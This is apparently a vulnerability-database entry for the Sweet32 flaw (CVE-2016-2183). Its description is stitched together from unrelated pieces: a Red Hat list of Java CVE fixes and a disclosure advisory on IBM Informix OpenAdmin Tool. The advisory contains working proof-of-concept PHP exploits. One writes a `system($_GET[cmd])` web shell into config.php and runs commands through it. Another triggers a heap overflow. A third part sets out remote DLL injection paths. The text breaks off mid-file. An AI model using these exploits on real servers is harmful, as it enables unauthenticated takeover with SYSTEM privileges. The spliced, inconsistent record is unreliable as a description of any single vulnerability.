Details of VAR-201609-0597

ID

VAR-201609-0597

CVE

CVE-2016-2183

TITLE

SSL/TLS Protocol CVE-2016-2183 Information Disclosure Vulnerability

Trust: 0.3

sources: BID: 92630

DESCRIPTION

The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. SSL/TLS Protocol is prone to an information-disclosure vulnerability Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. TLS (Transport Layer Security) is a set of protocols used to provide confidentiality and data integrity between two communication applications. SSH (full name Secure Shell) is a set of security protocols based on the application layer and transport layer developed by the Network Working Group of the Internet Engineering Task Force (IETF). IPSec (full name Internet Protocol Security) is a set of IP security protocols established by the IPSec group of the Internet Engineering Task Force (IETF). Both DES and Triple DES are encryption algorithms. There are information leakage vulnerabilities in the DES and Triple DES encryption algorithms used in the TLS, SSH, and IPSec protocols and other protocols and products. This vulnerability stems from configuration errors in network systems or products during operation. (CVE-2016-2183, CVE-2017-3272, CVE-2017-3289, CVE-2017-3253, CVE-2017-3261, CVE-2017-3231, CVE-2016-5547, CVE-2016-5552, CVE-2017-3252, CVE-2016-5546, CVE-2016-5548, CVE-2016-5549, CVE-2017-3241, CVE-2017-3259, CVE-2016-5573, CVE-2016-5554, CVE-2016-5542, CVE-2016-5597, CVE-2016-5556, CVE-2016-3598, CVE-2016-3511, CVE-2016-0363, CVE-2016-0686, CVE-2016-0687, CVE-2016-3426, CVE-2016-3427, CVE-2016-3443, CVE-2016-3449, CVE-2016-3422, CVE-2016-0376, CVE-2016-0264) 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/): 1324044 - CVE-2016-0363 IBM JDK: insecure use of invoke method in CORBA component, incorrect CVE-2013-3009 fix 1327743 - CVE-2016-0686 OpenJDK: insufficient thread consistency checks in ObjectInputStream (Serialization, 8129952) 1327749 - CVE-2016-0687 OpenJDK: insufficient byte type checks (Hotspot, 8132051) 1328059 - CVE-2016-3426 OpenJDK: non-constant time GCM authentication tag comparison (JCE, 8143945) 1328210 - CVE-2016-3427 OpenJDK: unrestricted deserialization of authentication credentials (JMX, 8144430) 1328618 - CVE-2016-3443 Oracle JDK: unspecified vulnerability fixed in 6u115, 7u101 and 8u91 (2D) 1328619 - CVE-2016-3449 Oracle JDK: unspecified vulnerability fixed in 6u115, 7u101 and 8u91 (Deployment) 1328620 - CVE-2016-3422 Oracle JDK: unspecified vulnerability fixed in 6u115, 7u101 and 8u91 (2D) 1330986 - CVE-2016-0376 IBM JDK: insecure deserialization in CORBA, incorrect CVE-2013-5456 fix 1331359 - CVE-2016-0264 IBM JDK: buffer overflow vulnerability in the IBM JVM 1356971 - CVE-2016-3598 OpenJDK: incorrect handling of MethodHandles.dropArguments() argument (Libraries, 8155985) 1358168 - CVE-2016-3511 Oracle JDK: unspecified vulnerability fixed in 7u111 and 8u101 (Deployment) 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1385544 - CVE-2016-5573 OpenJDK: insufficient checks of JDWP packets (Hotspot, 8159519) 1385714 - CVE-2016-5554 OpenJDK: insufficient classloader consistency checks in ClassLoaderWithRepository (JMX, 8157739) 1385723 - CVE-2016-5542 OpenJDK: missing algorithm restrictions for jar verification (Libraries, 8155973) 1386103 - CVE-2016-5597 OpenJDK: exposure of server authentication credentials to proxy (Networking, 8160838) 1386408 - CVE-2016-5556 Oracle JDK: unspecified vulnerability fixed in 6u131, 7u121, and 8u111 (2D) 1413554 - CVE-2017-3272 OpenJDK: insufficient protected field access checks in atomic field updaters (Libraries, 8165344) 1413562 - CVE-2017-3289 OpenJDK: insecure class construction (Hotspot, 8167104) 1413583 - CVE-2017-3253 OpenJDK: imageio PNGImageReader failed to honor ignoreMetadata for iTXt and zTXt chunks (2D, 8166988) 1413653 - CVE-2017-3261 OpenJDK: integer overflow in SocketOutputStream boundary check (Networking, 8164147) 1413717 - CVE-2017-3231 OpenJDK: URLClassLoader insufficient access control checks (Networking, 8151934) 1413764 - CVE-2016-5547 OpenJDK: missing ObjectIdentifier length check (Libraries, 8168705) 1413882 - CVE-2016-5552 OpenJDK: incorrect URL parsing in URLStreamHandler (Networking, 8167223) 1413906 - CVE-2017-3252 OpenJDK: LdapLoginModule incorrect userDN extraction (JAAS, 8161743) 1413911 - CVE-2016-5546 OpenJDK: incorrect ECDSA signature extraction from the DER input (Libraries, 8168714) 1413920 - CVE-2016-5548 OpenJDK: DSA implementation timing attack (Libraries, 8168728) 1413923 - CVE-2016-5549 OpenJDK: ECDSA implementation timing attack (Libraries, 8168724) 1413955 - CVE-2017-3241 OpenJDK: untrusted input deserialization in RMI registry and DCG (RMI, 8156802) 1414163 - CVE-2017-3259 Oracle JDK: unspecified vulnerability fixed in 6u141, 7u131, and 8u121 (Deployment) 6. Vulnerabilities Summary The following advisory describes six (6) vulnerabilities found in Informix Dynamic Server and Informix Open Admin Tool. IBM Informix Dynamic Server Exceptional, low maintenance online transaction processing (OLTP) data server for enterprise and workgroup computing. IBM Informix Dynamic Server has many features that cater to a variety of user groups, including developers and administrators. One of the strong features of IDS is the low administration cost. IDS is well known for its hands-free administration. To make server administration even easier, a new open source, platform-independent tool called OpenAdmin Tool (OAT) is now available to IDS users. The OAT includes a graphical interface for administrative tasks and performance analysis tools. Vulnerabilities: Unauthentication static PHP code injection that leads to remote code execution Heap buffer overflow Remote DLL Injection that leads to remote code execution (1) Remote DLL Injection that leads to remote code execution (2) Remote DLL Injection that leads to remote code execution (3) Remote DLL Injection that leads to remote code execution (4) Credit An independent security researcher has reported this vulnerability to Beyond Securityas SecuriTeam Secure Disclosure program Vendor response IBM has released patches to address those vulnerabilities and issued the following CVEas: CVE-2016-2183 CVE-2017-1092 For more Information a http://www-01.ibm.com/support/docview.wss?uid=swg22002897 Vulnerabilities Details IBM Informix Dynamic Server installs a PHP enable Apache server as a Windows Service (aApache_for_OATa) which listens on public port 8080 (tcp/http) for incoming requests to the OpenAdmin web panel. It runs with NT AUTHORITY\SYSTEM privileges. Unauthentication static PHP code injection that leads to remote code execution IBM Informix Dynamic Server Developer is vulnerable to Unauthentication static PHP code injection by invoking welcomeService.php which offers a SOAP interface. The welcomeServer.php class suffers of a static PHP code injection into the asaveHomePagea method. Arbitrary code can be injected into aconfig.phpa, which is accessible to remote users. Given this, a remote attacker could execute arbitrary code/commands with the privileges of the target service. Vulnerable code a C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\welcome\welcomeService.php ... <?php [..] $ini = ini_set("soap.wsdl_cache_enabled","0"); require_once("welcomeServer.php"); $server = new SoapServer("welcome.wsdl"); $server->setClass("welcomeServer"); if (isset($HTTP_RAW_POST_DATA)) { $request = $HTTP_RAW_POST_DATA; } else { $request = file_get_contents('php://input'); } $server->handle($request); ?> ... If we will look into saveHomePage() method inside C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\welcome\welcomeServer.php: ... /** * Save the selected home page in the config.php file. */ public function saveHomePage ($new_home_page) <--------------------------------------- { $this->idsadmin->load_lang("admin"); $conf_vars = $this->idsadmin->get_config("*"); // create backup of config file $src=$conf_vars['HOMEDIR']."/conf/config.php"; $dest=$conf_vars['HOMEDIR']."/conf/BAKconfig.php"; copy($src,$dest); // open the config file if (! is_writable($src)) { trigger_error($this->idsadmin->lang("SaveCfgFailure"). " $src"); return; } $fd = fopen($src,'w+'); <------------------------------ [*] // write out the config fputs($fd,"<?php \n"); foreach ($conf_vars as $k => $v) { if ($k == "HOMEPAGE") { $v = $new_home_page; <----------------------------------- [**] } else if ($k == "CONNDBDIR" || $k == "HOMEDIR") { // Replace backslashes in paths with forward slashes $this->idsadmin->in[$k] = str_replace('\\', '/', $this->idsadmin->in[$k]); /* idsdb00494581: An extra '"' gets written to $CONF['CONNDBDIR'] in config.php * silent install in /vobs/idsadmin/idsadmin/install/index.php:saveDefaultConfig() writes the above line * based on $conndbdir = addslashes(substr(@$_SERVER['argv'][3],11)); TODO: fix the initial writing into config.php (Windows only issue) */ if ($v[strlen($v)-1] == '"') { $v = substr($v, 0, -1); } } $out = "\$CONF['{$k}']=\"{$v}\";#{$this->idsadmin->lang($k)}\n"; <--------------------------- [***] fputs($fd,$out); <-------------------------------------- [****] } fputs($fd,"?>\n"); fclose($fd); return $new_home_page; } ... Note that $new_home_page is the unique parameter of a SOAP request and it is controlled; The resulting file could look like this: ... <?php $CONF['LANG']="en_US";#The default language for the OAT pages. $CONF['BASEURL']="http://WIN-PF2VMDT4MVO:8080/openadmin";#The URL where OAT is installed in this format: http://servername:port/location. $CONF['HOMEDIR']="C:/Program Files (x86)/IBM Informix Software Bundle/OAT/Apache_2.2.22/htdocs/openadmin/";#The directory for the OAT installation. $CONF['CONNDBDIR']="C:\Program Files (x86)\IBM Informix Software Bundle\OAT\OAT_conf";#The directory for the OAT connections database. Specify a secure directory that is not under the document directory for the web server. $CONF['HOMEPAGE']="";system($_GET[cmd]);//";#The page to use as the OAT home page. $CONF['PINGINTERVAL']="300";#The length of time (in seconds) between updates of the server status. The server status is shown on the Health Center > Dashboard > Group Summary page. $CONF['ROWSPERPAGE']="25";#The default number of rows per page to display when data is shown in a table format. $CONF['SECURESQL']="on";#Require login credentials for the SQL ToolBox. $CONF['INFORMIXCONTIME']="20";#The length of time (in seconds) that OAT attempts to connect to the database server before returning an error (INFORMIXCONTIME). $CONF['INFORMIXCONRETRY']="3";#The number of times that OAT attempts to connect to the database server during the Informix connect time (INFORMIXCONRETRY). $CONF['INFORMIXDIR']="C:\Program Files (x86)\IBM Informix Software Bundle";#MISSING LANG FILE ITEM INFORMIXDIR ?> ... config.php is not protected so we can execute system() through a GET request. Proof of Concept <?php error_reporting(0); $host = $argv[1]; $port = 8080; $shell = htmlentities("\";system(\$_GET[cmd]);//"); $data=' <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:Welcome"> <soapenv:Header/> <soapenv:Body> <urn:saveHomePage soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <new_home_page xsi:type="xsd:string">'.$shell.'</new_home_page> </urn:saveHomePage> </soapenv:Body> </soapenv:Envelope> '; $pk="POST /openadmin/services/welcome/welcomeService.php HTTP/1.1\r\n". "Host: ".$host."\r\n". "Content-Type: text/xml;charset=UTF-8 \r\n". "Content-Length: ".strlen($data)."\r\n". "SOAPAction: \"urn:QBEAction\"\r\n". "Connection: Close\r\n\r\n". $data; $fp = fsockopen($host,$port,$e,$err,5); fputs($fp,$pk); $out=""; while (!feof($fp)){ $out.=fread($fp,1); } fclose($fp); //echo $out."\n"; $pk="GET /openadmin/conf/config.php?cmd=whoami HTTP/1.0\r\n". "Host: ".$host."\r\n". "Connection: Close\r\n\r\n"; $fp = fsockopen($host,$port,$e,$err,5); fputs($fp,$pk); $out=""; while (!feof($fp)){ $out.=fread($fp,1); } fclose($fp); echo $out."\n"; ?> Heap buffer overflow IBM Informix Dynamic Server Developer is vulnerable to Unauthentication heap buffer overflow. By submitting connection parameters to index.php, through the aservera property, it is possible to trigger a heap buffer overflow vulnerability into the underlying PHP Informix extension (php_pdo_informix.dll). When attaching WinDbg to the httpd.exe sub-process, it shows: (1580.68c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=007b5360 ebx=04701bb0 ecx=007b5274 edx=00000276 esi=01010101 edi=046fe310 eip=007b14b5 esp=01f8f630 ebp=047677cc iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 php_pdo_informix+0x14b5: 007b14b5 894614 mov dword ptr [esi+14h],eax ds:002b:01010115=15ff012e esi is controlled by the attacker and could be used to execute arbitrary code or to create denial of service conditions 0:002> lm vm php_pdo_informix start end module name 014f0000 014fa000 php_pdo_informix (export symbols) C:\Program Files (x86)\IBM Informix Software Bundle\OAT\PHP_5.2.4\ext\php_pdo_informix.dll Loaded symbol image file: C:\Program Files (x86)\IBM Informix Software Bundle\OAT\PHP_5.2.4\ext\php_pdo_informix.dll Image path: C:\Program Files (x86)\IBM Informix Software Bundle\OAT\PHP_5.2.4\ext\php_pdo_informix.dll Image name: php_pdo_informix.dll Timestamp: Mon Jun 15 17:13:57 2009 (4A36E3C5) CheckSum: 00015E71 ImageSize: 0000A000 File version: 5.2.4.4 Product version: 5.2.4.0 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 2.0 Dll File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: The PHP Group ProductName: PHP php_pdo_informix.dll InternalName: php_pdo_informix.dll OriginalFilename: php_pdo_informix.dll ProductVersion: 5.2.4 FileVersion: 5.2.4.4 PrivateBuild: 5.2.4.4 SpecialBuild: 5.2.4.4 FileDescription: pdo_informix LegalCopyright: Copyright A(c) 1997-2007 The PHP Group LegalTrademarks: PHP Comments: Thanks to Rick McGuire, Dan Scott, Krishna Raman, Kellen Bombardier Proof of Concept <?php /* example connection string: informix:host=127.0.0.1;service=7360;database=sysmaster;protocol=onsoctcp;server=[0X01 X 69000] */ error_reporting(0); $host = $argv[1]; $port = 8080; $data="PASSWORD=*&USERNAME=*&SERVER=".str_repeat("\x01",69000)."&HOST=127.0.0.1&PORT=7360&IDSPROTOCOL=onsoctcp&TENANT_DBOWNER=&TENANT_DBNAME="; $pk="POST /openadmin/index.php?act=login&do=testconn HTTP/1.1\r\n". "Host: ".$host."\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Content-Length: ".strlen($data)."\r\n". "Connection: Close\r\n\r\n". $data; $fp = fsockopen($host,$port,$e,$err,5); fputs($fp,$pk); $out=""; while (!feof($fp)){ $out.=fread($fp,1); } fclose($fp); echo $out."\n"; ?> Remote DLL Injection that leads to remote code execution (1) IBM Informix Dynamic Server Developer is vulnerable to Unauthentication Remote DLL Injection that leads to remote code execution. by submitting connection parameters to index.php, setting the aacta parameter to alogina and the adoa one to atestconna, it is possible to inject arbitrary statements into a connection string for the underlying Informix database. The __construct() method of the PDO_OAT.php library passing them to PDO::__construct() without prior sensitization Given this it is possible to inject the aTRANSLATIONDLLa connection parameter and to point it to an arbitrary dll from a remote network share, prepared by the attacker. If the dll entry point contains malicious code, this will be executed instantly. This can be done ex. through the aHOSTa parameter of a POST request. Vulnerable code a C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\modules\login.php ... function testconn($internal=false) { $state = 1; $statemessage="Online"; $servername = $this->idsadmin->in['SERVER'];<-------------------------------------- [*] $host = $this->idsadmin->in['HOST']; <------------------------------------------ $port = $this->idsadmin->in['PORT']; <------------------------------------------- $protocol = $this->idsadmin->in['IDSPROTOCOL']; <------------------------------------ // The below distinction (sysmaster/sysadmin) is needed to avoid the error (-570:Cannot reference an external ANSI database.) when a tenant owner's permissions are being verified. // The error happens when connecting to sysmaster and issuing the query (below, joining sysadmin:ph_allow_list and <tenant_db>:sysusers) to check against sysusers on an ansi db if (isset($this->idsadmin->in['TENANT_DBOWNER']) && ($this->idsadmin->in['TENANT_DBOWNER'] == 1 || $this->idsadmin->in['TENANT_DBOWNER'] == true)) { $dbname = "sysadmin"; } else { $dbname = "sysmaster"; } $user = $this->idsadmin->in['USERNAME']; <-------------------------------------- $passwd = $this->idsadmin->in['PASSWORD']; <---------------------------- $envvars = (isset($this->idsadmin->in['ENVVARS']))? $this->idsadmin->in['ENVVARS'] : null; require_once (ROOT_PATH."lib/PDO_OAT.php"); try { $tdb = new PDO_OAT($this->idsadmin,$servername,$host,$port,$protocol,$dbname,"",$envvars,$user,$passwd); <----------------------- [**] } catch(PDOException $e) { $message=preg_split("/:/",$e->getMessage()); $statemessage= $message[sizeof($message)-1]; $statemessage="{$this->idsadmin->lang('ConnectionFailed')} {$statemessage}"; $state=3; } if (isset($this->idsadmin->in['TENANT_DBOWNER']) && ($this->idsadmin->in['TENANT_DBOWNER'] == 1 || $this->idsadmin->in['TENANT_DBOWNER'] == 'true')) { if ($state == 3) { if ($internal) { return $statemessage; } else { $tdb=null; echo $statemessage; die(); } } $sql = "SELECT COUNT(*) as nameexists " . "FROM sysadmin:ph_allow_list al, {$this->idsadmin->in['TENANT_DBNAME']}:sysusers su " . "WHERE al.name = '{$this->idsadmin->in['USERNAME']}' " . "AND al.name = su.username " . "AND su.usertype IN ('D','R') " . "AND al.perm_list LIKE '%tenant%';"; try { $stmt = $tdb->query($sql,false,true); } catch (PDOException $e) { $err_code = $e->getCode(); $err_msg = $e->getMessage(); $statemessage = "{$this->idsadmin->lang('ConnectionFailed')} {$err_code}:{$err_msg}"; if ($internal) { return $statemessage; } else { $tdb=null; echo $statemessage; die(); } } $row = $stmt->fetch(); $stmt->closeCursor(); if ( $row['NAMEEXISTS'] == 0 ) { $statemessage = "{$this->idsadmin->lang('InsufficientPrivs')}"; } if ($internal) { return $statemessage; } else { $tdb=null; echo $statemessage; die(); } } $tdb=null; echo $statemessage; die(); } ... Letas look into C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\lib\PDO_OAT.php ... function __construct(&$idsadmin,$servername,$host,$port,$protocol,$dbname="sysmaster",$locale="",$envvars=null,$username="",$password="") { $this->idsadmin=&$idsadmin; $this->idsadmin->load_lang("database"); $this->dbname = $dbname; $informixdir = $this->idsadmin->get_config("INFORMIXDIR"); $dsn = self::getDSN($servername,$host,$port,$protocol,$informixdir,$dbname,$locale,$envvars); <---------------------- [***] putenv("INFORMIXCONTIME={$this->idsadmin->get_config("INFORMIXCONTIME",20)}"); putenv("INFORMIXCONRETRY={$this->idsadmin->get_config("INFORMIXCONRETRY",3)}"); parent::__construct($dsn,$username,utf8_decode($password)); <----------------------------------- [*****] } static function getDSN ($servername,$host,$port,$protocol,$informixdir,$dbname="sysmaster",$locale="",$envvars=null) { $dsn = "informix:host={$host}"; <------------------------------------ [****] $dsn .= ";service={$port}"; $dsn .= ";database={$dbname}"; $dsn .= ";protocol={$protocol}"; $dsn .= ";server={$servername}"; if ( substr(PHP_OS,0,3) != "WIN" ) { $libsuffix = (strtoupper(substr(PHP_OS,0,3)) == "DAR")? "dylib":"so"; $dsn .= ";TRANSLATIONDLL={$informixdir}/lib/esql/igo4a304.".$libsuffix; $dsn .= ";Driver={$informixdir}/lib/cli/libifdmr.".$libsuffix.";"; } if (!is_null($envvars) && $envvars != "" ) { // add envvars to connection string $dsn .= ";$envvars"; } if ( $locale != "" ) { // CLIENT_LOCALE should always be UTF-8 version of databse locale $client_locale = substr($locale,0,strrpos($locale,".")) . ".UTF8"; $dsn .= ";CLIENT_LOCALE={$client_locale};DB_LOCALE={$locale};"; } return $dsn; } ... At [***] the getDSN() function is called At [****] and following various parameters are concatenated into a connection string without prior sanitization and set to $dsn At [*****] the resulting connection string itas passed to PDO::__construct(), resulting in the dll to be loaded instantly. Remote DLL Injection that leads to remote code execution (2) IBM Informix Dynamic Server Developer is vulnerable to Unauthentication Remote DLL Injection that leads to remote code execution. By submitting a SOAP request to oliteService.php, specifying ex. the acanConnectToIDSa method, it is possible to inject arbitrary parameters into a database connection string for the underlying Informix database. It is possible to inject ex. the aTRANSLATIONDLLa parameter and, if this parameter points to a dll into an existing remote network share, the dll will be injected into the remote Apache process. If malicious code is contained into the dll entry point, this will be executed instantly. Vulnerable code is located inside the getDBConnection() function of the underlying oliteServer.php PHP class, where connection parameters are concatenated without prior sanitization. Vulnerable code a C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\olite\oliteService.php ... <?php [..] $ini = ini_set("soap.wsdl_cache_enabled","0"); require_once("oliteServer.php"); $server = new SoapServer("olite.wsdl"); $server->setClass("oliteServer"); if (isset($HTTP_RAW_POST_DATA)) { $request = $HTTP_RAW_POST_DATA; } else { $request = file_get_contents('php://input'); } $server->handle($request); ?> ... The SOAP interface can be interrogated without prior authentication, Letas take a look into acanConnectToIDSa method inside C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\olite\oliteServer.php ... /** * Verify that a connection to the server can be made. * @return true if a new PDO can be created and server version is >= 11, false otherwise */ function canConnectToIDS($server, $host, $port, $protocol, $username, $password, $lang="en_US") { $this->setOATLiteLang($lang); $sql = "SELECT DBINFO('version','major') AS vers FROM sysha_type "; $this->handlingPDOException = TRUE; try { $temp = $this->doDatabaseWork($sql, "sysmaster", $server, $host, $port, $protocol, $username, $password); <------------- [1] /* set handlingPDOException back to false in case this is used in a multi call */ $this->handlingPDOException = FALSE; } catch(PDOException $e) { return array("canConnect" => false, "message" => $e->getMessage()); } catch(Exception $e1) { //error_log("Could not connect, returning false"); return array("canConnect" => false, "message" => $e1->getMessage()); } //error_log(var_export($temp)); //error_log("temp: " . var_export($temp[0]['VERS'], true)); if($temp[0]['VERS'] < 11) { return array("canConnect" => false, "message" => $this->idsadmin->lang('ServerVersionLessThan11')); } else { return array("canConnect" => true, "message" => ""); } } ... $server, $host, $port, $protocol are received from the SOAP request and they are fully controlled; at [1] doDatabaseWork() is called, then look: ... /** * Runs query on specified database * @return array containing all selected records */ private function doDatabaseWork($sel, $dbname="sysmaster", $serverName, $host, $port, $protocol, $user, $password, $timeout = 10, $exceptions=false, $locale=NULL) { $ret = array(); if ( $this->useSameConnection == null ) $db = $this->getDBConnection($dbname, $serverName, $host, $port, $protocol, $user, $password, $timeout, $locale); <--------------------- [2] else $db = $this->useSameConnection; while (1 == 1) { $stmt = $db->query($sel); // not required as this is using the PDO->query not the $idsadmin->db->query ,false,$exceptions,$locale); $err = $db->errorInfo(); if ( $err[1] != 0 ) { trigger_error("{$err[1]} - {$err[2]}",E_USER_ERROR); } while ($row = $stmt->fetch(PDO::FETCH_ASSOC) ) { $ret[] = $row; } $err = $db->errorInfo(); if ( $err[2] == 0 ) { $stmt->closeCursor(); break; } else { $err = "Error: {$err[2]} - {$err[1]}"; $stmt->closeCursor(); trigger_error($err,E_USER_ERROR); continue; } } return $ret; } ... At [2] getDBConnection() is called with controlled parameters, finally look: ... /** * Gets connection to specified database */ function getDBConnection($dbname, $serverName, $host, $port, $protocol, $user, $password, $timeout = 10, $locale = null) { //$INFORMIXCONTIME=2; $INFORMIXCONRETRY=10; settype($timeout, 'integer'); putenv("INFORMIXCONTIME={$timeout}"); putenv("INFORMIXCONRETRY={$INFORMIXCONRETRY}"); $dsn .= "informix:host={$host}"; <------------------------------------ [3] $dsn .= ";service={$port}"; <---------------------------------- $dsn .= ";database={$dbname}"; <--------------------------------------- $dsn .= ";protocol={$protocol}"; <---------------------------------- $dsn .= ";server={$serverName}"; <------------------------------- $db = null; if(substr(PHP_OS,0,3) != "WIN") { $informixdir = $this->idsadmin->get_config("INFORMIXDIR"); $libsuffix = (strtoupper(substr(PHP_OS,0,3)) == "DAR") ? "dylib" : "so"; $dsn .= ";TRANSLATIONDLL={$informixdir}/lib/esql/igo4a304.".$libsuffix; $dsn .= ";Driver={$informixdir}/lib/cli/libifdmr.".$libsuffix.";"; } if ( $locale != null ) { $client_locale = substr($locale,0,strrpos($locale,".")) . ".UTF8"; $dsn .= ";CLIENT_LOCALE={$client_locale};DB_LOCALE={$locale};"; } if ( $this->handlingPDOException === FALSE ) { try { $db = new PDO ("{$dsn}",$user,utf8_decode($password) ); <------------------------------- [4] boom! } catch ( PDOException $e ) { //error_log(var_export ( $db->errorInfo() , true ) ); //trigger_error($e->getMessage(),E_USER_ERROR); $exception = $this->parsePDOException($e->getMessage()); throw new SoapFault("{$exception['code']}",$exception['message']); } } else { $db = new PDO ("{$dsn}",$user,$password); } return $db; } ... At [3] a connection string is concatenated without prior sanitization, arbitrary parameters can be injected via a;a; aTRANSLATIONDLLa and other dangerous parameters can be specified. At [4], the resulting connection string is passed to the PDO object, causing the dll to be loaded before the authentication is performed. Remote DLL Injection that leads to remote code execution (3) IBM Informix Dynamic Server Developer is vulnerable to Unauthentication Remote DLL Injection that leads to remote code execution. The specific flaw exists within two PHP scripts in OpenAdmin tool. MACH11Server.php allows to insert a row into the underlying SQLite Database without prior authentication, by sending a specific SOAP request to MACH11Service.php and specifying the aaddServerToCachea method. pinger.php construct a connection string for the underlying Informix database, based on the row previously inserted. Given this it is possible to inject the aTRANSLATIONDLLa property into this connection string and to cause the Apache process to load the pointed dll from a remote network share controlled by the attacker. vulnerable code a C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\idsadmin\MACH11Server.php ... function addServerToCache ($group_num , $host , $port , $server , $idsprotocol , $lat , $lon , $username , $password , $cluster_id , $last_type ) { $password = connections::encode_password($password); $query = "INSERT INTO connections " . " ( group_num " . " , host " . " , port " . " , server " . " , idsprotocol " . " , lat " . " , lon " . " , username " . " , password " . " , cluster_id " . " , last_type ) " . " VALUES ( {$group_num} " . " , '{$host}' " . " , '{$port}' " . " , '{$server}' " . " , '{$idsprotocol}'" . " , {$lat} " . " , {$lon} " . " , '{$username}' " . " , '{$password}' " . " , {$cluster_id} " . " , {$last_type} ) "; $this->doDatabaseWork ( $query ); return $this->db->lastInsertId ( ); //return sqlite_last_insert_rowid ( $this->db ); } ... The previously empty aconnectionsa table is populated with one row. Letas look at C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\lib\pinger.php <?php [..] register_shutdown_function("shutdownHandler",$db); ini_set("max_execution_time", -1); #set the maxexecution time.. set_time_limit(-1); ignore_user_abort(TRUE); @header( 'Content-Type: image/gif' ); print base64_decode( 'R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==' ); ob_flush(); /** * pinger * get / update the status of each server in the connections db. */ # set the CONFDIR define(CONFDIR,"../conf/"); require_once(CONFDIR."config.php"); $pinginterval=isset($CONF["PINGINTERVAL"]) ? $CONF["PINGINTERVAL"] : 300; if ( ! isset($CONF['CONNDBDIR']) ) { // error_log("Please check config.php param CONNDBDIR - it doesnt seem to be set."); return; } if ( ! is_dir($CONF['CONNDBDIR']) ) { error_log("Please check config.php param CONNDBDIR - it doesnt seem to be set to a directory."); return; } $dbfile="{$CONF['CONNDBDIR']}/connections.db"; $informixdir=getenv("INFORMIXDIR"); if ( ! file_exists($dbfile) ) { // error_log("*** Cannot find connections.db - {$dbfile} ****"); die(); } unset($CONF); # connect to the sqlite database. $db = new PDO ("sqlite:{$dbfile}"); $db->setAttribute(PDO::ATTR_CASE,PDO::CASE_UPPER); /** * lets get our last runtime and if we are running .. */ $qry = "select lastrun , isrunning from pingerinfo"; $stmt = $db->query($qry); $row = $stmt->fetch(PDO::FETCH_ASSOC); $stmt->closeCursor(); if ( $row['ISRUNNING'] > 0 ) { $timenow = time(); if ( $timenow - $row['LASTRUN'] > 3000 ) { error_log( "Reset pinger - should run next time "); $db->query("update pingerinfo set isrunning = 0"); } /* we are already running so lets just quit now */ die(); } $timenow = time(); if ( $timenow - $row['LASTRUN'] < $pinginterval ) { // error_log( "no need to run "."Last: ".($timenow - $row['LAST'])." - {$pinginterval}" ); die(); } $db->query("update pingerinfo set isrunning = {$timenow} "); // error_log ( "we better run "."Last: ".($timenow - $row['LAST'])." - {$pinginterval}" ); putenv("INFORMIXCONTIME=5"); putenv("INFORMIXCONRETRY=1"); /** * prepare the update string. */ $update = $db->prepare("update connections set lastpingtime=:now, laststatus=:state , laststatusmsg=:statemsg where conn_num = :conn_num"); $update2 = $db->prepare("update connections set lastpingtime=:now, laststatus=:state , laststatusmsg=:statemsg, lastonline=:lastonline where conn_num = :conn_num"); /** * we need to include the lib/connections.php * so we can access the password hooks functions. */ require_once 'connections.php'; /** * lets get all our defined connections. */ $sql = "select * from connections order by server"; $stmt = $db->query($sql); $rows = $stmt->fetchAll(PDO::FETCH_ASSOC); $starttime=time(); $status = "Start Time: {$starttime}\n"; foreach ( $rows as $k=>$row ) { $now = time(); $dsn = <<<EOF informix:host={$row['HOST']};service={$row['PORT']};database=sysmaster;server={$row['SERVER']};protocol={$row['IDSPROTOCOL']}; //<---------------------- [1] EOF; if ( substr(PHP_OS,0,3) != "WIN" ) { $libsuffix = (strtoupper(substr(PHP_OS,0,3)) == "DAR")? "dylib":"so"; $dsn .= ";TRANSLATIONDLL={$informixdir}/lib/esql/igo4a304.".$libsuffix; $dsn .= ";Driver={$informixdir}/lib/cli/libifdmr.".$libsuffix.";"; } $statemessage="Online"; $state=1; $user = $row['USERNAME']; $passwd = connections::decode_password( $row['PASSWORD'] ); try { $pingdb = new PDO($dsn,$user,utf8_decode($passwd)); <---------------------------------- [2] } catch(PDOException $e) { // error_log( $e->getMessage() ); $message=preg_split("/:/",$e->getMessage()); $statemessage= preg_replace("#\[.+\]#","",$message[1]); $statemessage.=" Last Online:".lastonlineconv($row['LASTONLINE']); $state=3; } [..] ... at [1] a connection string is concatenated with values taken from SQLite connection table. Arbitrary properties can be specified through a;a, leading to remote code execution, when [2] the PDO object is instantiated. Remote DLL Injection that leads to remote code execution (4) IBM Informix Dynamic Server Developer is vulnerable to Unauthentication Remote DLL Injection that leads to remote code execution. By contact the aadminapiService.phpa SOAP interface and constructing a proper request to this endpoint, with the acreateSBSpacea method specified, it possible to inject parameters into a connection string for the underlying Informix database. vulnerable code a C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\adminapi\adminapiService.php ... <?php 